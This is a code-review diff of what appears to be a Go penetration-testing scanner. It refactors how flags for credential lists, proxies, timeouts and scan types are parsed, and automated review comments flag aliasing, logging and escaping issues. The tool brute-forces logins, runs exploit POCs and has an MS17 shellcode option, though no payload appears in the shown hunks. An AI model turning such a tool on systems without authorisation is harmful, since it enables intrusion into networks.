newRequest, err := http.NewRequest(rule.Method, fmt.Sprintf("%s://%s%s", req.Url.Scheme, req.Url.Host, string([]rune(req.Url.Path))), strings.NewReader(rule.Body))
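Review bot: The added `defer func() { variableMap = nil }()` has no effect — `variableMap` is a local that becomes unreachable when executePoc returns regardless, and nil-ing it in a defer neither frees it sooner nor helps the GC; drop the line. In the second hunk, enabling `req.Url.Path = strings.ReplaceAll(req.Url.Path, " ", "%20")` handles only spaces before the path is concatenated raw into `http.NewRequest`, so a `rule.Path` containing `%`, `#` or non-ASCII bytes still goes out unescaped, while `?` is deliberately left alone because, per the comment, some POCs carry the query in Path. If that trade-off is intended, record it beside the line: `// Only spaces are escaped: '?' must stay literal because some POCs put the query string in Path.` executePoc continues outside both hunks.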
|
||||
|
|
|
@ -23,7 +23,7 @@ var (
|
|||
|
||||
func Inithttp(PocInfo common.PocInfo) {
|
||||
//PocInfo.Proxy = "http://127.0.0.1:8080"
|
||||
err := InitHttpClient(PocInfo.Num, PocInfo.Proxy, time.Duration(PocInfo.Timeout)*time.Second)
|
||||
err := InitHttpClient(PocInfo.Num, common.Proxy, time.Duration(common.WebTimeout)*time.Second)
|
||||
if err != nil {
|
||||
log.Fatal(err)
|
||||
}
|
||||
|
@ -57,7 +57,7 @@ func InitHttpClient(ThreadsNum int, DownProxy string, Timeout time.Duration) err
|
|||
} else {
|
||||
return errors.New("Failed type assertion to DialContext")
|
||||
}
|
||||
}else if DownProxy != "" {
|
||||
} else if DownProxy != "" {
|
||||
if DownProxy == "1" {
|
||||
DownProxy = "http://127.0.0.1:8080"
|
||||
} else if DownProxy == "2" {
|
||||
|
@ -65,7 +65,7 @@ func InitHttpClient(ThreadsNum int, DownProxy string, Timeout time.Duration) err
|
|||
} else if !strings.Contains(DownProxy, "://") {
|
||||
DownProxy = "http://127.0.0.1:" + DownProxy
|
||||
}
|
||||
if !strings.HasPrefix(DownProxy,"socks") && !strings.HasPrefix(DownProxy,"http") {
|
||||
if !strings.HasPrefix(DownProxy, "socks") && !strings.HasPrefix(DownProxy, "http") {
|
||||
return errors.New("no support this proxy")
|
||||
}
|
||||
u, err := url.Parse(DownProxy)
|
||||
|
|
|
@ -599,13 +599,13 @@ func DoRequest(req *http.Request, redirect bool) (*Response, error) {
|
|||
oResp, err = ClientNoRedirect.Do(req)
|
||||
}
|
||||
if err != nil {
|
||||
fmt.Println(err)
|
||||
//fmt.Println("[-]DoRequest error: ",err)
|
||||
return nil, err
|
||||
}
|
||||
defer oResp.Body.Close()
|
||||
resp, err := ParseResponse(oResp)
|
||||
if err != nil {
|
||||
fmt.Println(err)
|
||||
fmt.Println("[-]ParseResponse error: ", err)
|
||||
return nil, err
|
||||
}
|
||||
return resp, err
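Review bot: `fmt.Println("[-]ParseResponse error: ", err)` (like the existing `fmt.Println(err)` above it) prints to stdout from inside DoRequest while the same error is also returned to the caller, so each failure is reported twice and the text lands in the scan output rather than in whatever log the rest of the tool uses; either route it through the project's logging helper or leave reporting to the caller. Farther up, `InitHttpClient` checks the `socks`/`http` prefix before `url.Parse`, so a scheme such as `httpx://` passes the check and is only rejected, if at all, by the transport; testing `u.Scheme` after parsing is tighter. DoRequest continues outside the hunk.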
|
||||
|
|
|
@ -12,19 +12,19 @@ import (
|
|||
)
|
||||
|
||||
func Parse(Info *HostInfo) {
|
||||
ParseUser(Info)
|
||||
ParseUser()
|
||||
ParsePass(Info)
|
||||
ParseInput(Info)
|
||||
ParseScantype(Info)
|
||||
}
|
||||
|
||||
func ParseUser(Info *HostInfo) {
|
||||
if Info.Username == "" && Userfile == "" {
|
||||
func ParseUser() {
|
||||
if Username == "" && Userfile == "" {
|
||||
return
|
||||
}
|
||||
|
||||
if Info.Username != "" {
|
||||
Info.Usernames = strings.Split(Info.Username, ",")
|
||||
var Usernames []string
|
||||
if Username != "" {
|
||||
Usernames = strings.Split(Username, ",")
|
||||
}
|
||||
|
||||
if Userfile != "" {
|
||||
|
@ -32,37 +32,38 @@ func ParseUser(Info *HostInfo) {
|
|||
if err == nil {
|
||||
for _, user := range users {
|
||||
if user != "" {
|
||||
Info.Usernames = append(Info.Usernames, user)
|
||||
Usernames = append(Usernames, user)
|
||||
}
|
||||
}
|
||||
}
|
||||
}
|
||||
|
||||
Info.Usernames = RemoveDuplicate(Info.Usernames)
|
||||
Usernames = RemoveDuplicate(Usernames)
|
||||
for name := range Userdict {
|
||||
Userdict[name] = Info.Usernames
|
||||
Userdict[name] = Usernames
|
||||
}
|
||||
}
|
||||
|
||||
func ParsePass(Info *HostInfo) {
|
||||
if Info.Password != "" {
|
||||
passs := strings.Split(Info.Password, ",")
|
||||
var PwdList []string
|
||||
if Password != "" {
|
||||
passs := strings.Split(Password, ",")
|
||||
for _, pass := range passs {
|
||||
if pass != "" {
|
||||
Info.Passwords = append(Info.Passwords, pass)
|
||||
PwdList = append(PwdList, pass)
|
||||
}
|
||||
}
|
||||
Passwords = Info.Passwords
|
||||
Passwords = PwdList
|
||||
}
|
||||
if Passfile != "" {
|
||||
passs, err := Readfile(Passfile)
|
||||
if err == nil {
|
||||
for _, pass := range passs {
|
||||
if pass != "" {
|
||||
Info.Passwords = append(Info.Passwords, pass)
|
||||
PwdList = append(PwdList, pass)
|
||||
}
|
||||
}
|
||||
Passwords = Info.Passwords
|
||||
Passwords = PwdList
|
||||
}
|
||||
}
|
||||
if UrlFile != "" {
|
||||
|
@ -149,7 +150,7 @@ func ParseInput(Info *HostInfo) {
|
|||
|
||||
if UserAdd != "" {
|
||||
user := strings.Split(UserAdd, ",")
|
||||
for a, _ := range Userdict {
|
||||
for a := range Userdict {
|
||||
Userdict[a] = append(Userdict[a], user...)
|
||||
Userdict[a] = RemoveDuplicate(Userdict[a])
|
||||
}
|
||||
|
@ -166,12 +167,12 @@ func ParseInput(Info *HostInfo) {
|
|||
}
|
||||
|
||||
func ParseScantype(Info *HostInfo) {
|
||||
_, ok := PORTList[Info.Scantype]
|
||||
_, ok := PORTList[Scantype]
|
||||
if !ok {
|
||||
showmode()
|
||||
}
|
||||
if Info.Scantype != "all" && Info.Ports == DefaultPorts+","+Webport {
|
||||
switch Info.Scantype {
|
||||
if Scantype != "all" && Info.Ports == DefaultPorts+","+Webport {
|
||||
switch Scantype {
|
||||
case "rdp":
|
||||
Info.Ports = "3389"
|
||||
case "web":
|
||||
|
@ -187,10 +188,10 @@ func ParseScantype(Info *HostInfo) {
|
|||
case "main":
|
||||
Info.Ports = DefaultPorts
|
||||
default:
|
||||
port, _ := PORTList[Info.Scantype]
|
||||
port, _ := PORTList[Scantype]
|
||||
Info.Ports = strconv.Itoa(port)
|
||||
}
|
||||
fmt.Println("-m ", Info.Scantype, " start scan the port:", Info.Ports)
|
||||
fmt.Println("-m ", Scantype, " start scan the port:", Info.Ports)
|
||||
}
|
||||
}
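Review bot: `Userdict[name] = Usernames` in ParseUser stores the same slice header under every service key, so all entries alias one backing array, and ParseInput's `for a := range Userdict { Userdict[a] = append(Userdict[a], user...) ... }` then appends through that shared array once per key. Today every key receives the identical `user...`, so the writes coincide and nothing visible breaks, but the first per-service append with different content would silently overwrite the other services' lists. Give each key its own copy: `Userdict[name] = append([]string(nil), Usernames...)`. The same aliasing existed with `Info.Usernames` before this change, so the refactor preserves a pre-existing hazard rather than introducing one.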
|
||||
|
||||
|
|
|
@ -45,28 +45,15 @@ var Webport = "80,81,82,83,84,85,86,87,88,89,90,91,92,98,99,443,800,801,808,880,
|
|||
var DefaultPorts = "21,22,80,81,135,139,443,445,1433,1521,3306,5432,6379,7001,8000,8080,8089,9000,9200,11211,27017"
|
||||
|
||||
type HostInfo struct {
|
||||
Host string
|
||||
Ports string
|
||||
Domain string
|
||||
Url string
|
||||
Path string
|
||||
Timeout int64
|
||||
Scantype string
|
||||
Command string
|
||||
SshKey string
|
||||
Username string
|
||||
Password string
|
||||
Usernames []string
|
||||
Passwords []string
|
||||
Infostr []string
|
||||
Hash string
|
||||
Host string
|
||||
Ports string
|
||||
Url string
|
||||
Infostr []string
|
||||
}
|
||||
|
||||
type PocInfo struct {
|
||||
Num int
|
||||
Rate int
|
||||
Timeout int64
|
||||
Proxy string
|
||||
PocName string
|
||||
PocDir string
|
||||
Target string
|
||||
|
@ -79,10 +66,19 @@ type PocInfo struct {
|
|||
}
|
||||
|
||||
var (
|
||||
Path string
|
||||
Scantype string
|
||||
Command string
|
||||
SshKey string
|
||||
Domain string
|
||||
Username string
|
||||
Password string
|
||||
Proxy string
|
||||
Timeout int64
|
||||
WebTimeout int64
|
||||
TmpOutputfile string
|
||||
TmpSave bool
|
||||
IsPing bool
|
||||
IsWmi bool
|
||||
Ping bool
|
||||
Pocinfo PocInfo
|
||||
IsWebCan bool
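Review bot: `PocInfo` still declares `Timeout` and `Proxy` (context in the first hunk) while the flag bindings that used to fill them now target the new package globals `WebTimeout` and `Proxy`, so unless something outside this diff assigns them, `Pocinfo.Timeout` and `Pocinfo.Proxy` are now always zero and any remaining reader silently gets no proxy and a zero timeout. Either delete the two fields or mirror the globals into them right after `flag.Parse()`. A short comment on the `var (` block, e.g. `// Process-wide CLI settings; read by every scanner and must not be mutated per host.`, would also help readers who previously found these on HostInfo. The PocInfo struct continues past the end of the first hunk.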
|
||||
|
|
|
@ -25,14 +25,14 @@ func Flag(Info *HostInfo) {
|
|||
flag.StringVar(&UserAdd, "usera", "", "add a user base DefaultUsers,-usera user")
|
||||
flag.StringVar(&PassAdd, "pwda", "", "add a password base DefaultPasses,-pwda password")
|
||||
flag.StringVar(&NoPorts, "pn", "", "the ports no scan,as: -pn 445")
|
||||
flag.StringVar(&Info.Command, "c", "", "exec command (ssh)")
|
||||
flag.StringVar(&Info.SshKey, "sshkey", "", "sshkey file (id_rsa)")
|
||||
flag.StringVar(&Info.Domain, "domain", "", "smb domain")
|
||||
flag.StringVar(&Info.Username, "user", "", "username")
|
||||
flag.StringVar(&Info.Password, "pwd", "", "password")
|
||||
flag.Int64Var(&Info.Timeout, "time", 3, "Set timeout")
|
||||
flag.StringVar(&Info.Scantype, "m", "all", "Select scan type ,as: -m ssh")
|
||||
flag.StringVar(&Info.Path, "path", "", "fcgi、smb romote file path")
|
||||
flag.StringVar(&Command, "c", "", "exec command (ssh)")
|
||||
flag.StringVar(&SshKey, "sshkey", "", "sshkey file (id_rsa)")
|
||||
flag.StringVar(&Domain, "domain", "", "smb domain")
|
||||
flag.StringVar(&Username, "user", "", "username")
|
||||
flag.StringVar(&Password, "pwd", "", "password")
|
||||
flag.Int64Var(&Timeout, "time", 3, "Set timeout")
|
||||
flag.StringVar(&Scantype, "m", "all", "Select scan type ,as: -m ssh")
|
||||
flag.StringVar(&Path, "path", "", "fcgi、smb romote file path")
|
||||
flag.IntVar(&Threads, "t", 600, "Thread nums")
|
||||
flag.IntVar(&LiveTop, "top", 10, "show live len top")
|
||||
flag.StringVar(&HostFile, "hf", "", "host file, -hf ip.txt")
|
||||
|
@ -55,10 +55,10 @@ func Flag(Info *HostInfo) {
|
|||
flag.StringVar(&URL, "u", "", "url")
|
||||
flag.StringVar(&UrlFile, "uf", "", "urlfile")
|
||||
flag.StringVar(&Pocinfo.PocName, "pocname", "", "use the pocs these contain pocname, -pocname weblogic")
|
||||
flag.StringVar(&Pocinfo.Proxy, "proxy", "", "set poc proxy, -proxy http://127.0.0.1:8080")
|
||||
flag.StringVar(&Proxy, "proxy", "", "set poc proxy, -proxy http://127.0.0.1:8080")
|
||||
flag.StringVar(&Socks5Proxy, "socks5", "", "set socks5 proxy, will be used in tcp connection, timeout setting will not work")
|
||||
flag.StringVar(&Pocinfo.Cookie, "cookie", "", "set poc cookie,-cookie rememberMe=login")
|
||||
flag.Int64Var(&Pocinfo.Timeout, "wt", 5, "Set web timeout")
|
||||
flag.Int64Var(&WebTimeout, "wt", 5, "Set web timeout")
|
||||
flag.IntVar(&Pocinfo.Num, "num", 20, "poc rate")
|
||||
flag.StringVar(&SC, "sc", "", "ms17 shellcode,as -sc add")
|
||||
flag.Parse()
|
||||
|
|